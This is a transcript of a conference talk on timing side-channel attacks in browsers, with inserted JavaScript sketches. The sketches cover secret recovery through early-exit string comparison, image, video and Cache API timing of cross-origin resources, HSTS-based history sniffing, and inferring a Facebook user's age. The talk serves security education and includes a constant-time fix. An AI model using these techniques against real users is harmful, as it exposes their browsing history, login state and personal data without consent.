Front-End Performance: The Dark Side by Mathias Bynens
This is the third talk in a set of three talks on technical performance, delivered on April 1, 2016 at Fronteers Spring Conference in Amsterdam.
In security-sensitive situations, performance can actually be a bug rather than a feature. This presentation covers timing attacks on the web, and demonstrates how modern performance-related web APIs can sometimes have a negative security impact.
So our third speaker of the section is kind of a long-term friend of Fronteers'.
You'll have seen him around at Fronteers before, either-- [CLAP] --the sound of one hand clapping.
Yeah, you will have seen him either at the October event.
You've maybe seen him in Belgium, where he's kind of getting Fronteers up and running there as well.
He also delivered some kind of mind-bending lightning talks in October as well.
A lot of information crammed into 10 minutes there.
So I'm interested to see what can go into 20 minutes here today.
Mathias works at Opera, where-- Woo! Woo! First whoop of the day.
It took-- what time is it? It's 3 o'clock, and that was the first whoop of the day.
[INAUDIBLE] that awesome.
There we go.
So you have a ready made fan base.
One person who's going to cheer for the rest of the day, I'm hoping.
Web standards evangelist at Opera.
And he's going to be talking about the dark side of front-end performance.
So make him very welcome, Mathias Bynens.
[APPLAUSE] Hi, everyone.
So I'm going to close off this block on technical performance by focusing on some security-sensitive situations in which performance is actually a bad thing.
I will also demonstrate that some new performance-related web APIs can also impact security negatively.
So let's get started.
Let's start with something simple: comparing two strings for equality.
You would probably write a function kind of like this.
Well, maybe you wouldn't even write a function.
So let's see some examples here.
Well, OK, we compare the string Fronteers with itself, and the result is true.
And if we compare two strings that are different, the result is false.
This is exactly what we would expect.
Now, this is supposed to be about performance, so let's time how long these operations take.
Well, in the first case, it takes about 1,000 microseconds, let's say.
But if we compare the string Fronteers with an S at the end with Fronteers with a Z at the end, it also takes about 1,000 microseconds.
However, if we compare spring with thing, this operation completes in only 100 microseconds.
And if we compare CSS with XSS, we get the result in 200 microseconds.
So there's a lot of differences here between how long it takes for this function to run, depending on the different inputs that we feed it.
And just imagine how you would be implementing this if there was no way to compare strings directly.
You would have to loop over each character in the string, get its character code, and then compare those numbers one by one in the loop.
But there are some obvious performance optimizations that we can apply in such a case.
It would look probably something like this.
So the first optimization that we can do before we even get to the looping part is just check the length of these strings.
If the length of the strings is different, then we know that the strings cannot possibly be equal.
So we can just return false right away and avoid doing any more work.
This is an early exit.
Now, there is another performance optimization that we can perform from within the loop.
As soon as we find a character at a certain position that is different in between the two strings, we can also exit early and just return false right away.
There's no reason for us to be checking those remaining characters at that point.
Well, in terms of performance, the worst case scenario is really if the strings are equal, because it means you have to run through all the possible characters in each string and compare them one by one.
And only at the very end you can return true.
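The slide itself isn't reproduced in the transcript, but a comparison function with the two optimizations just described might look something like this (my own sketch; the function name is made up):

```javascript
// Naive string comparison with the two "performance optimizations"
// described above -- both of which, as we'll see, leak timing information.
function insecureCompare(a, b) {
  // Optimization 1: early exit when the lengths differ.
  if (a.length !== b.length) return false;
  // Optimization 2: early exit at the first mismatching character.
  for (let i = 0; i < a.length; i++) {
    if (a.charCodeAt(i) !== b.charCodeAt(i)) return false;
  }
  // Worst case, performance-wise: the strings are equal, and every
  // character had to be compared before we could return true.
  return true;
}

console.log(insecureCompare('Fronteers', 'Fronteers')); // true
console.log(insecureCompare('spring', 'thing'));        // false (length check)
console.log(insecureCompare('CSS', 'XSS'));             // false (first character)
```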
So looking back on our earlier results, this kind of explains why there is such a difference there.
So if we compare Fronteers with an S at the end with Fronteers with a Z at the end, optimization number two kicks in, but there's not a lot of advantage there, because the optimization only kicks in at the very last character of the string.
And at that point, well, all the work has been done anyway.
Now, if we compare spring with thing, on the other hand-- careful there.
So if you compare spring with thing, this will be a really fast operation, because these two strings have a completely different length.
So all that happens is really the checking of the length and then the return false kicks in.
Finally, if we compare CSS with XSS, the second optimization kicks in, and this time this advantage is because it's the very first character of the two strings that is already different.
So we only have to check one character.
It only hits that loop for one iteration, and after that we just return false.
And this explains the difference in timings here.
So the main thing to remember here is that we're not just getting a Boolean result out of this function call.
We can infer a lot more information about the inner workings of the function by just timing it and looking how much time it takes for the function call to complete.
And this is what is known in the cryptography world as a side channel leak, because the side channel that is being used in this case is the timing measurement.
You could say that this function, or just comparing two strings in this way, is vulnerable to a timing attack.
And that's what I'm going to be talking about today.
Now, usually this is not really a problem.
However, the problem starts when you compare some user input, for example, with a value that is supposed to remain secret.
Because all those performance optimizations that we implemented earlier are now suddenly a weakness in this code.
The very first optimization, where we return false early from the function if the lengths of the two strings are different, allows us to basically figure out how many characters the secret string contains.
We can figure out the expected length just by trying a number of different inputs and measuring how long it takes for the operation to complete.
An attacker could just send one character, then two characters, then three characters.
Just time how long each of those operations take, and as soon as one of those operations takes a bit longer than all the previous ones, that's when you know you found the expected length of the secret string.
So then you know the length of the expected secret string, like a password or a hash.
It could be anything that's supposed to be secret.
So then you end up within the loop.
You just create a string of the desired length, and you start with the first character.
You can start guessing for that character.
You try the character A, then B, then C, and so on.
And, again, you just time everything, and as soon as your timing measurement is a bit greater than all the previous attempts, it probably means you found the correct character, because it means the function won't return false from that iteration anymore.
It will continue on to the next character within the loop, and it will call some more code at that point.
So we can use this timing side channel to figure out pretty much all the characters in the string as well as the desired length.
And then for the final character, you would still have to brute force that one.
But at that point, it's pretty easy to do that.
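To make the guessing loop just described concrete, here is a hedged sketch of it. In a real attack the signal would be wall-clock time; here, for clarity and determinism, the number of character comparisons stands in for it, and all names are my own:

```javascript
// Instrumented version of the insecure comparison: instead of timing
// it, count how many character comparisons happen before it bails out.
function countComparisons(guess, secret) {
  if (guess.length !== secret.length) return 0; // early length exit
  let count = 0;
  for (let i = 0; i < guess.length; i++) {
    count++;
    if (guess.charCodeAt(i) !== secret.charCodeAt(i)) break; // early exit
  }
  return count;
}

function recoverSecret(secret, alphabet) {
  let recovered = '';
  // Recover all but the last character via the side channel: a correct
  // guess at position `pos` makes the loop run at least one step further.
  for (let pos = 0; pos < secret.length - 1; pos++) {
    let best = alphabet[0];
    let bestCount = -1;
    for (const char of alphabet) {
      const guess = recovered + char + 'a'.repeat(secret.length - pos - 1);
      const count = countComparisons(guess, secret);
      if (count > bestCount) { bestCount = count; best = char; }
    }
    recovered += best;
  }
  // The side channel cannot distinguish the final character (right or
  // wrong, the loop ends at the same step), so brute-force it directly.
  for (const char of alphabet) {
    if (recovered + char === secret) return recovered + char;
  }
  return recovered;
}

const alphabet = 'abcdefghijklmnopqrstuvwxyz'.split('');
console.log(recoverSecret('hunter', alphabet)); // "hunter"
```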
So how can we avoid this kind of problem in this specific case for the comparison function? Well, if you're comparing anything sensitive in strings, you should use a safe comparison function.
This is called a constant time comparison function.
And how do you create such a function? Well, you basically just undo all those performance optimizations that we had there before.
You avoid any kind of early exits and, not only that, you also try to make sure that the function executes the same number of instructions, regardless of the input.
So here you can see, I'm still checking the length at the beginning of the function, but rather than returning early, I just store this kind of as a flag and some variable.
And I still go through the entire looping process, even though I know it won't really be necessary.
But the main goal is to make sure the function does not execute much faster depending on the input.
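Again, the slide isn't in the transcript, but a constant-time comparison along these lines might look like the sketch below. Note that a JavaScript engine may still introduce timing variation of its own, which is why real implementations usually run server-side or use a dedicated primitive such as Node's crypto.timingSafeEqual:

```javascript
// A constant-time(-ish) comparison: no early exits, and the same
// amount of work regardless of where, or whether, the strings differ.
function secureCompare(a, b) {
  // Record a length mismatch in a flag instead of returning early.
  let mismatch = a.length === b.length ? 0 : 1;
  // Always loop over the full length of the first string.
  for (let i = 0; i < a.length; i++) {
    // XOR is nonzero for differing characters; OR accumulates any
    // difference without branching on it.
    mismatch |= a.charCodeAt(i) ^ b.charCodeAt(i % b.length);
  }
  return mismatch === 0;
}
```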
So this is a very simple example of a timing attack.
And you're probably wondering how we, as front-end web developers, can actually execute a timing attack on the client side and thereby attack the users of our website.
Well, here's some very simple code that you can use for this.
What you could do is you could start a timer and then load an HTML page as an image.
Now the browser will start loading this page, but when the browser tries to parse it as an image, of course it will fail, because most HTML documents aren't valid images.
And at that point, the error event handler will be fired.
So at that point, you can stop the timer and just log the results.
So when I fill in the blanks here, it looks something like this.
And this very simple piece of code will give you an idea of how long it took for the user to download this particular resource.
It could be any URL that is not an image.
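Filled in, the snippet described above might look something like this (browser-only; the function name and callback shape are my own):

```javascript
// Rough download-time measurement: load an arbitrary URL as an image.
// HTML is not a valid image, so once the download finishes and decoding
// fails, the error event fires and we stop the timer.
function timeResourceViaImage(url, callback) {
  const start = performance.now();
  const img = new Image();
  img.onerror = () => {
    // Download finished, decoding failed: report the elapsed time.
    callback(performance.now() - start);
  };
  img.src = url;
}

// Example usage (illustrative URL):
// timeResourceViaImage('https://example.com/wp-admin/', ms => console.log(ms));
```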
So how is this useful? How could we abuse this if we were evil? Well, imagine that a given URL returns either a very big response body or a very small response body based on some property of the user.
And here's an example of that.
Let's say we're talking about a WordPress Administrator Dashboard page.
You have this one URL.
And if you're not logged in, you will be presented with a page that looks like this.
It's just a very simple log in form asking you to log in.
It will be a fairly lightweight response body.
Let's say it takes 750 milliseconds to load.
However, if the user is logged in, they will get a response body containing all of this data.
So the response will be much larger, and it's fair to assume it takes a little bit longer to download as well.
Let's say it takes 1,250 milliseconds to download.
You're not supposed to be able to figure out if a user has even visited a certain website in the past.
And this tells us much more.
It tells us the user actually has an account there and is logged in at the current time.
This shouldn't be happening.
Now, the technique that I just showed you is very simple, but it's also very crude and definitely not super accurate.
And you're all performance-savvy people, so I'm sure you know what's wrong with this kind of approach.
The main problem with it is that you're measuring something that goes over the network.
And the network itself is inherently unreliable.
Also, file size does not necessarily correspond to download time, because of gzip or Brotli compression that could be going on.
And this kind of approach only measures the download time, so it wouldn't notice that difference.
You can actually make this technique a little bit more accurate if you just keep on repeating it a couple of times.
But the obvious downside is that then you would have to make several HTTP requests for the same resource over and over again, which brings with it its own performance problems.
So in other words, this particular approach is not very impressive or scary.
And that's also probably why we haven't seen a lot of large-scale timing attacks on the web.
But the key to improving this attack is to avoid any kind of network measurements as much as possible.
Some recent web standards, some of which are performance related, have accidentally enabled some more robust techniques that we can use to perform these timing attacks.
And I'm going to show you a couple of quick demos of fairly recent research by different people.
The first demo is called Sniffly, by Yan, who gave a talk earlier.
Sniffly is a timing attack that detects the browser history for the victim.
So out of a list of domains, Sniffly can figure out if you have visited that domain before or not.
And I can tell you, browsers are trying all kinds of things to prevent exactly this kind of thing from happening.
So it really shouldn't be possible, and Yan still found a way to do it.
And this is how it works in a nutshell.
Maybe simplifying a little bit over here, but bear with me.
So for each domain that Sniffly checks, it starts a timer and then it loads an image off of that domain over HTTP.
Now, all these domains in the list, they use HTTP Strict Transport Security, or HSTS.
This means that if the user has visited that website before, the HSTS entry is in the browser cache.
And the browser will automatically make the request over HTTPS instead.
It won't even try to make the request over HTTP.
It will go straight to HTTPS.
Now, the other part of the trick is that CSP is used-- Content Security Policy-- to restrict images to HTTP only.
So images are essentially blocked before they get redirected to HTTPS.
And as we saw earlier, when an image gets blocked, the error event fires, and then the timer is stopped.
And at that point, Sniffly knows how long it took for the image to be redirected from HTTP to HTTPS.
Now, if this took, let's say, 1 millisecond or something like that, then it's very likely that it didn't actually go over the network and come back with a redirect response in just the 1 millisecond.
That's way too fast.
It means the browser has automatically redirected to HTTPS because the user has visited the site before.
And the HSTS entry is in the browser cache.
However, if it took more like, let's say, 100 milliseconds, then the network request probably did occur, and this indicates that the user has not visited the domain.
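In code, the core of the trick might be sketched like this (browser-only and heavily simplified compared to the real Sniffly; the attacking page is assumed to be served with a Content-Security-Policy such as `img-src http://*`, and the 10 ms threshold is purely illustrative):

```javascript
// Simplified sketch of the Sniffly idea. The page restricts images to
// plain HTTP via CSP. For an HSTS domain, the browser either rewrites
// the request to HTTPS internally (visited before: blocked almost
// instantly) or goes out over the network first and only then hits the
// HTTPS redirect (not visited: blocked much later).
function probeHstsDomain(domain, callback) {
  const start = performance.now();
  const img = new Image();
  img.onerror = () => {
    const elapsed = performance.now() - start;
    // Threshold is illustrative; the real Sniffly calibrates per browser.
    callback(elapsed < 10 ? 'probably visited' : 'probably not visited');
  };
  img.src = 'http://' + domain + '/favicon.ico';
}
```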
I thought that was a really clever kind of attack.
And then I bumped into some other research by Tom Van Goethem, who figured out an improved technique called the video parsing timing attack.
So instead of creating an image like we did before, now you just create a video.
You point it at any HTML resource-- well, basically anything that isn't a real video.
So use any URL that you want.
And then you can use the suspend event to get a kind of notification when the download has completed.
At that point, you start the timer.
And as soon as the error event fires, this means that the browser has tried parsing this HTML file as a video, which obviously wouldn't work.
Then you just stop the timer.
So the main difference with the previous technique here is that you're not measuring the download time anymore.
You're not measuring anything that goes over the network.
You're just measuring how long it takes for the browser to figure out that, hey, this is not a video that I can decode.
And it turns out that this depends on how big the resource is.
The bigger the resource, the longer it takes for the browser to throw this error.
So this gives you a very accurate idea of how big the file is compared to another file.
With this technique, you can compare two different resources on the web and with great accuracy, say, that OK this one is apparently bigger than the other one.
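A sketch of the video parsing timing attack as described (browser-only; the names are my own, and the exact event timing can vary between browsers):

```javascript
// Time how long the browser spends discovering that a non-video
// resource is not decodable. The 'suspend' event signals that the
// download has stopped, so the timer excludes network time entirely.
function timeVideoParse(url, callback) {
  const video = document.createElement('video');
  let start;
  video.addEventListener('suspend', () => {
    // Download complete: start timing the parse attempt.
    start = performance.now();
  });
  video.addEventListener('error', () => {
    // Parsing failed; larger resources take longer to reject.
    callback(performance.now() - start);
  });
  video.src = url;
}
```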
Now, Tom went even a little bit further, and he improved his technique into a cache storage timing attack.
And this uses two fairly modern web APIs.
It combines the Fetch API, with some settings to make it behave kind of similarly to the image request that we saw earlier.
And it also uses the programmable cache API that is available, not just within a service worker, but also outside of it.
So essentially it downloads a resource.
Once the download has completed, it starts the timer.
Then it times how long it takes to put this resource into the programmable cache.
And the main advantage of this technique is that you can repeat it without having to re-download the file over and over again.
You can download it once, and then just put it in the cache 1,000 times if you need a more accurate measurement.
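A sketch of the cache storage timing attack as described (browser-only; the fetch options, cache name, and function name are assumptions on my part):

```javascript
// Download the resource once, then repeatedly time how long it takes
// to put it into the programmable cache -- a duration that correlates
// with the response size, with no further network requests needed.
async function timeCachePut(url, iterations) {
  // 'no-cors' fetches a cross-origin resource as an opaque response,
  // and 'include' sends the victim's cookies, similar to the image trick.
  const response = await fetch(url, { mode: 'no-cors', credentials: 'include' });
  const cache = await caches.open('timing-demo'); // cache name is arbitrary
  const start = performance.now();
  for (let i = 0; i < iterations; i++) {
    // Clone so the original response body is never consumed.
    await cache.put(url, response.clone());
  }
  return performance.now() - start;
}
```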
So this is where it becomes pretty scary.
So we have a very accurate client-side timing attack on our hands.
But what can we do with it, really? Well, just imagine that I work for an evil company.
Let's say it's an advertisement company that I work for, and I want to figure out as much information about my site's visitors as possible without them actually giving me that information.
I basically want to kind of invade their privacy, figure out what age groups they belong to, what their gender is, their interests.
Anything I can find out for free, I want to know.
So here's a demo of this kind of attack in action.
You're all familiar with Facebook, right? Well, on Facebook you can create a Facebook page.
And once you have a Facebook page, you can write a post to it.
And you can target these posts to specific audiences.
You can restrict the audience in terms of age, gender, location, or even languages that they speak.
So what happens in this case? Well, yeah, so no luck there.
It's very unfortunate.
Anyway, so if you create a post like that, what happens if you try to visit it? So you get the permalink like the URL for this particular post.
And you open it up in Facebook, and if you match the criteria on your Facebook profile, then you can actually view the post.
You will get a response that looks like this.
You see the post content, the comments to the post.
Well, there aren't any comments here, but you get the idea.
There's also a list of suggested pages in the sidebar.
So the response body is kind of large.
And let's say adding this page to the cache 10 times takes 30 milliseconds, as measured through the timing attack that we saw earlier.
Now, if you view the same URL on another Facebook profile that doesn't match the criteria that we set earlier, you would get something like this instead.
It's just an error message and nothing else.
So the response body is much smaller.
And adding this page to the cache 10 times takes only 15 milliseconds.
So here's a pretty scary demo of this where everything is nicely visualized.
So here you see that we're just making six different requests.
Each request represents a Facebook post that is targeted towards a specific range of ages.
We just add them to the cache over and over again, like 1,000 times, and then we measure how long it takes to get really accurate results.
And after a couple of seconds, it already becomes clear that apparently the Facebook user this was tested on, who was 26 by the way, is in the age range from 23 to 32.
Now, once we found out this about our user, we can take it one step further and create an HTTP request for each of the specific Facebook posts for each individual age in that range.
And once again, after just a couple of seconds, it becomes quite clear which of these will be the real age of our victim.
In this case 26 years.
So, of course, this demo visualizes everything into these moving charts, and it's fairly fancy.
But the scary part is that this could be happening in the background while you're visiting any website whatsoever.
You could be reading an article or watching a video, and the website could be using this timing attack to figure out all this information about you and basically invade your privacy without you ever knowing about it.
I think this is something that warrants more discussion.
So, yeah, pretty scary stuff.
And if you want to find out more about this, check out the resources and the research I used in this talk.
Also, there is a bonus link with more examples of timing attacks on the web by Eduardo Vela.
So check it out if you're interested.